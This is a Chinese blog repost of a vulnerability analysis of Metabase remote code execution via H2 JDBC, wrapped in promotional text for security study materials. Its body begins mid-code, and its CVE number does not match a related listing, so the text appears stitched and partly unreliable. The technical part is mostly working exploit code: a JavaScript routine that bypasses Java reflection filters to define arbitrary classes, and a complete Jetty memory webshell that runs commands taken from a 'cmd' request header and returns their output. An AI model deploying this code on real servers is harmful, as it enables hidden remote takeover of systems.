漏洞分析|Metabase 代码执行漏洞(CVE-2024-38646):H2 JDBC 深入利用(1)

于 2024-05-14 14:02:05 发布
阅读量356 收藏 7
点赞数 4
分类专栏: 程序员 文章标签: 网络安全 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84297899/article/details/138852783
版权

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

theUnsafeMethod.setAccessible(true);
return theUnsafeMethod.get(null);
}
function removeClassCache(clazz){
var unsafe = getUnsafe();
var clazzAnonymousClass = unsafe.defineAnonymousClass(clazz,java.lang.Class.forName(“java.lang.Class”).getResourceAsStream(“Class.class”).readAllBytes(),null);
var reflectionDataField = clazzAnonymousClass.getDeclaredField(“reflectionData”);
unsafe.putObject(clazz,unsafe.objectFieldOffset(reflectionDataField),null);
}
function bypassReflectionFilter() {
var reflectionClass;
try {
reflectionClass = java.lang.Class.forName(“jdk.internal.reflect.Reflection”);
} catch (error) {
reflectionClass = java.lang.Class.forName(“sun.reflect.Reflection”);
}
var unsafe = getUnsafe();
var classBuffer = reflectionClass.getResourceAsStream(“Reflection.class”).readAllBytes();
var reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass, classBuffer, null);
var fieldFilterMapField = reflectionAnonymousClass.getDeclaredField(“fieldFilterMap”);
var methodFilterMapField = reflectionAnonymousClass.getDeclaredField(“methodFilterMap”);
if (fieldFilterMapField.getType().isAssignableFrom(java.lang.Class.forName(“java.util.HashMap”))) {
unsafe.putObject(reflectionClass, unsafe.staticFieldOffset(fieldFilterMapField), java.lang.Class.forName(“java.util.HashMap”).getConstructor().newInstance());
}
if (methodFilterMapField.getType().isAssignableFrom(java.lang.Class.forName(“java.util.HashMap”))) {
unsafe.putObject(reflectionClass, unsafe.staticFieldOffset(methodFilterMapField), java.lang.Class.forName(“java.util.HashMap”).getConstructor().newInstance());
}
removeClassCache(java.lang.Class.forName(“java.lang.Class”));
}
function setAccessible(accessibleObject){
var unsafe = getUnsafe();
var overrideField = java.lang.Class.forName(“java.lang.reflect.AccessibleObject”).getDeclaredField(“override”);
var offset = unsafe.objectFieldOffset(overrideField);
unsafe.putBoolean(accessibleObject, offset, true);
}
function defineClass(){
var clz = null;
var version = java.lang.System.getProperty(“java.version”);
var unsafe = getUnsafe();
var classLoader = new java.net.URLClassLoader(java.lang.reflect.Array.newInstance(java.lang.Class.forName(“java.net.URL”), 0));
try{
if (version.split(“.”)[0] >= 11) {
bypassReflectionFilter();
defineClassMethod = java.lang.Class.forName(“java.lang.ClassLoader”).getDeclaredMethod(“defineClass”, java.lang.Class.forName(“[B”),java.lang.Integer.TYPE, java.lang.Integer.TYPE);
setAccessible(defineClassMethod);
// 绕过 setAccessible
clz = defineClassMethod.invoke(classLoader, bytes, 0, bytes.length);
}else{
var protectionDomain = new java.security.ProtectionDomain(new java.security.CodeSource(null, java.lang.reflect.Array.newInstance(java.lang.Class.forName(“java.security.cert.Certificate”), 0)), null, classLoader, []);
clz = unsafe.defineClass(null, bytes, 0, bytes.length, classLoader, protectionDomain);
}
}catch(error){
error.printStackTrace();
}finally{
return clz;
}
}
defineClass();


#### 4.4 漏洞回显


在漏洞回显时,我们就可以借助 `DefineClass` 来执行完成对漏洞的回显利用,但是目前最新版本的 Metabase 使用 Jetty11,所以需要针对该版本做回显适配,核心代码如下:

import java.io.OutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Scanner;

/**
* Jetty CMD 回显马
* @author R4v3zn woo0nise@gmail.com
* @version 1.0.1
*/
public class JE2 {

public JE2(){
    try{
        invoke();
    }catch (Exception e){
        e.printStackTrace();
    }
}

public void invoke()throws Exception{
    ThreadGroup group = Thread.currentThread().getThreadGroup();
    java.lang.reflect.Field f = group.getClass().getDeclaredField("threads");
    f.setAccessible(true);
    Thread[] threads = (Thread[]) f.get(group);
    thread : for (Thread thread: threads) {
        try{
            Field threadLocalsField = thread.getClass().getDeclaredField("threadLocals");
            threadLocalsField.setAccessible(true);
            Object threadLocals = threadLocalsField.get(thread);
            if (threadLocals == null){
                continue;
            }
            Field tableField = threadLocals.getClass().getDeclaredField("table");
            tableField.setAccessible(true);
            Object tableValue = tableField.get(threadLocals);
            if (tableValue == null){
                continue;
            }
            Object[] tables =  (Object[])tableValue;
            for (Object table:tables) {
                if (table == null){
                    continue;
                }
                Field valueField = table.getClass().getDeclaredField("value");
                valueField.setAccessible(true);
                Object value = valueField.get(table);
                if (value == null){
                    continue;
                }
                System.out.println(value.getClass().getName());
                if(value.getClass().getName().endsWith("AsyncHttpConnection")){
                    Method method = value.getClass().getMethod("getRequest", null);
                    value = method.invoke(value, null);
                    method = value.getClass().getMethod("getHeader", new Class[]{String.class});
                    String cmd = (String)method.invoke(value, new Object[]{"cmd"});
                    String result = "\n"+exec(cmd);
                    method = value.getClass().getMethod("getPrintWriter", new Class[]{String.class});
                    java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(value, new Object[]{"utf-8"});
                    printWriter.println(result);
                    printWriter.flush();
                    break thread;
                }else if(value.getClass().getName().endsWith("HttpConnection")){
                    Method method = value.getClass().getDeclaredMethod("getHttpChannel", null);
                    Object httpChannel = method.invoke(value, null);
                    method = httpChannel.getClass().getMethod("getRequest", null);
                    value = method.invoke(httpChannel, null);
                    method = value.getClass().getMethod("getHeader", new Class[]{String.class});
                    String cmd = (String)method.invoke(value, new Object[]{"cmd"});
                    String result = "\n"+exec(cmd);
                    method = httpChannel.getClass().getMethod("getResponse", null);
                    value = method.invoke(httpChannel, null);
                    method = value.getClass().getMethod("getWriter", null);
                    java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(value, null);
                    printWriter.println(result);
                    printWriter.flush();
                    break thread;
                }else if (value.getClass().getName().endsWith("Channel")){
                    Field underlyingOutputField = value.getClass().getDeclaredField("underlyingOutput");
                    underlyingOutputField.setAccessible(true);
                    Object underlyingOutput = underlyingOutputField.get(value);
                    Object httpConnection;
                    try{
                        Field _channelField = underlyingOutput.getClass().getDeclaredField("\_channel");
                        _channelField.setAccessible(true);
                        httpConnection = _channelField.get(underlyingOutput);
                    }catch (Exception e){
                        Field connectionField = underlyingOutput.getClass().getDeclaredField("this$0");
                        connectionField.setAccessible(true);
                        httpConnection = connectionField.get(underlyingOutput);
                    }
                    Object request = httpConnection.getClass().getMethod("getRequest").invoke(httpConnection);
                    Object response = httpConnection.getClass().getMethod("getResponse").invoke(httpConnection);
                    String cmd = (String) request.getClass().getMethod("getHeader", String.class).invoke(request, "cmd");
                    OutputStream outputStream = (OutputStream)response.getClass().getMethod("getOutputStream").invoke(response);
                    String result = "\n"+exec(cmd);
                    outputStream.write(result.getBytes());
                    outputStream.flush();
                    break thread;
                }
            }
        }catch (Exception e){}
    }
}

public String exec(String cmd){
    if (cmd != null && !"".equals(cmd)) {
        String os = System.getProperty("os.name").toLowerCase();
        cmd = cmd.trim();
        Process process = null;
        String[] executeCmd = null;
        if (os.contains("win")) {
            if (cmd.contains("ping") && !cmd.contains("-n")) {
                cmd = cmd + " -n 4";
            }
            executeCmd = new String[]{"cmd", "/c", cmd};
        } else {
            if (cmd.contains("ping") && !cmd.contains("-n")) {
                cmd = cmd + " -t 4";
            }
            executeCmd = new String[]{"sh", "-c", cmd};
        }
        try {
            process = Runtime.getRuntime().exec(executeCmd);
            Scanner s = new Scanner(process.getInputStream()).useDelimiter("\\a");
            String output = s.hasNext() ? s.next() : "";
            s = new Scanner(process.getErrorStream()).useDelimiter("\\a");
            output += s.hasNext()?s.next():"";
            return output;
        } catch (Exception e) {
            e.printStackTrace();
            return e.toString();
        } finally {
            if (process != null) {
                process.destroy();
            }
        }
    } else {
        return "command not null";
    }
}

}


### 0x05 总结


本次漏洞利用数据库连接信息触发漏洞,利用 H2 导致可以进行任意命令。我们采用 `TRIGGER` + `DefineClass` 完成对漏洞的利用,通过我们的研究分析发现该技术不光可应用在数据库连接中,更多可应用于 H2 的 SQL 注入,完成 SQL 注入 -> 代码执行的过程。


### 0x06 参考


* <https://pyn3rd.github.io/2022/06/06/Make-JDBC-Attacks-Brillian-Again-I/>


  

Goby 欢迎表哥/表姐们加入我们的社区大家庭,一起交流技术、生活趣事、奇闻八卦,结交无数白帽好友。


也欢迎投稿到 Goby(Goby 介绍/扫描/口令爆破/漏洞利用/插件开发/ PoC 编写/ IP 库使用场景/ Webshell /漏洞分析 等文章均可),审核通过后可奖励 Goby 红队版,快来加入微信群体验吧~~~


文章来自Goby社区成员:路人甲@白帽汇安全研究院,转载请注明出处。  



还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!


王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。


对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!


【完整版领取方式在文末!!】


***93道网络安全面试题***


![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)








![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)





![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)





内容实在太多,不一一截图了


### 黑客学习资源推荐


最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

#### 1️⃣零基础入门


##### ① 学习路线


对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。


![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供:


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84297899
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metabase 敏感信息泄露漏洞复现(CVE-2021-41277)
千寻的博客
12-20 1822
文章目录漏洞描述漏洞编号FOFA 查询影响范围修复版本:环境搭建漏洞复现漏洞修复摘抄 漏洞描述 metabase 是一个简单、开源的数据分析平台。 在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证 攻击者可通过该漏洞获得敏感信息。 漏洞编号 CVE-2021-41277 FOFA 查询 app=”metabase” 影响范围 metabase version &lt
Metabase任意文件读取漏洞CVE-2021-41277)
一枚不知名的Java程序猿
10-03 1624
CVE-2021-41277漏洞复现
2024网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 758
任务环境说明:服务器场景:Server1。
漏洞分析Metabase 代码执行漏洞CVE-2024-38646):H2 JDBC 深入利用
2401_84254057的博客
05-04 1150
本次漏洞利用数据库连接信息触发漏洞利用 H2 导致可以进行任意命令。我们采用TRIGGER完成对漏洞利用,通过我们的研究分析发现该技术不光可应用在数据库连接中,更多可应用于 H2 的 SQL 注入,完成 SQL 注入 -> 代码执行的过程。
最新polar CTF CB链_cb链 polar wp(3),2024年最新网络安全事件分发机制收藏这一篇就够了
最新发布
2401_84281629的博客
05-14 437
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
JDBC的SQL注入漏洞分析和解决
weixin_33924312的博客
03-12 97
1.1.1 SQL注入漏洞分析1.1.2 SQL注入漏洞解决需要采用PreparedStatement对象解决SQL注入漏洞。这个对象将SQL预先进行编译,使用?作为占位符。?所代表内容是SQL所固定。再次传入变量(包含SQL的关键字)。这个时候也不会识别这些关键字。 public class UserDao { public boolean login(String usern...
JDBC漏洞利用总结
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
12-23 2212
文章目录环境搭建JDBC任意文件下载JDBC反序列化漏洞JDBC命令执行 写点关于jdbc漏洞利用方法 环境搭建 maven依赖 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.2.1</version> </dependenc
CVE-2021-41277——Metabase 信息泄露漏洞
热门推荐
LiBai'S BLOG
11-21 1万+
Metabase 信息泄露漏洞漏洞简介FOFA语法EXP漏洞测试漏洞修复 漏洞简介 Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。 CNNVD编号:CNNVD-202111-1565 危害等级: 超危 CVE编号: CVE-2021-41277 FOFA语法 app="Metabase
metabase-google-sheets-add-on:将配置数据库问题直接导入到Google表格中
04-29
importQuestion :使用其问题ID号(您可以在问题URL的末尾找到)从Metabase导入单个问题到当前的Google表格标签中 importAllQuestions :使用以下名称约定导入Google表格中的所有问题: (metabase/123) ->导入问题...
Python库 | metabase_api-0.2.6-py3-none-any.whl
03-22
总之,`metabase_api`库为Python开发者提供了一种高效的方式来利用Metabase的强大功能,无论是数据探索、报表构建还是与其他系统的集成,都极大地提升了数据分析的效率。通过深入理解和熟练使用这个库,开发人员能够...
metabase-compose:使用compose运行Metabase的dockerized解决方案
02-05
1. 下载并解压`metabase-compose-main`压缩包。 2. 编辑`docker-compose.yml`以配置数据库服务(如MySQL或PostgreSQL)。 3. 运行`docker-compose up -d`启动服务,`-d`参数使服务在后台运行。 4. 访问`...
influxdb时序数据库linux版本
10-07
配合grafana使用的时序数据库,用于日常项目的监控,这个是能开放web页面访问的最新版本,再高的版本将没有web管理页面
metabase-athena-driver:适用于Metabase 0.32及更高版本的Amazon Athena驱动程序
01-30
Metabase与Amazon Athena驱动程序】 Metabase是一款开源的...综上所述,`metabase-athena-driver`让Metabase用户能够充分利用AWS Athena的强大查询能力,同时保持Metabase的易用性,是大数据分析和查询的理想组合。
metabase-clickhouse-driver:用于Metabase商业智能前端的ClickHouse数据库驱动程序
05-03
元数据库-clickhouse-驱动程序( )商业智能前端的 ( )数据库驱动程序安装下载Metabase Jar and Run 从“下载最新的元数据库二进制发行版(jar文件)。 从该存储库的“发布”页面下载ClickHouse驱动程序jar 创建一...
漏洞复现】Metabase 远程命令执行漏洞(CVE-2023-38646)
做自己喜欢的事,并将其发挥到极致!
08-03 4603
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以服务器的权限级别在服务器上执行任意命令。
CVE-2021-41277(metebase信息泄漏漏洞复现)
haoaaao的博客
04-26 1861
0x00 前置知识 1、metebase metabase是一款开源的BI分析工具,开发语言clojure+React为主、也有高阶的收费版。 官网:Metabase | Business Intelligence, Dashboards, and Data Visualization可以利用Metabase进行数据分析,数据可视化,报表生成等。 Metabase介绍_Sshine___的博客-CSDN博客_metabase 2、影响版本: metabase v...
开源BI分析工具 Metabase 中存在远程代码执行漏洞,未完全修复
smellycat000的专栏
07-28 339
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士在商业情报 (BI) 领域,开源工具 Metabase 以无缝的数据解释能力占据一席之地。该自助服务BI工具已用于全球各地的组织机构中,赋能用户提出数据问题并获得可视化的、易于理解的答案。Metabase 的设计对用户友好,无需了解SQL或其它编程语言的知识,扩宽了组织机构中的可用性。Metabase 与多种数据来源相连,如关系数据库、云存储和平...
Metabase 信息泄露漏洞CVE-2021-41277)——漏洞复现
W小哥
11-24 2977
一、漏洞简介 metabase 是一个简单、开源的数据分析平台。 CVE-2021-41277 在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。 该漏洞CVSS评分:9.9,危害等级:严重 二、影响版本 影响版本: metabase version < 0.40.5 metabase version >= 1.0.0, < 1
Metabase 存在任意文件读取漏洞
nnn2188185的博客
04-28 358
Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值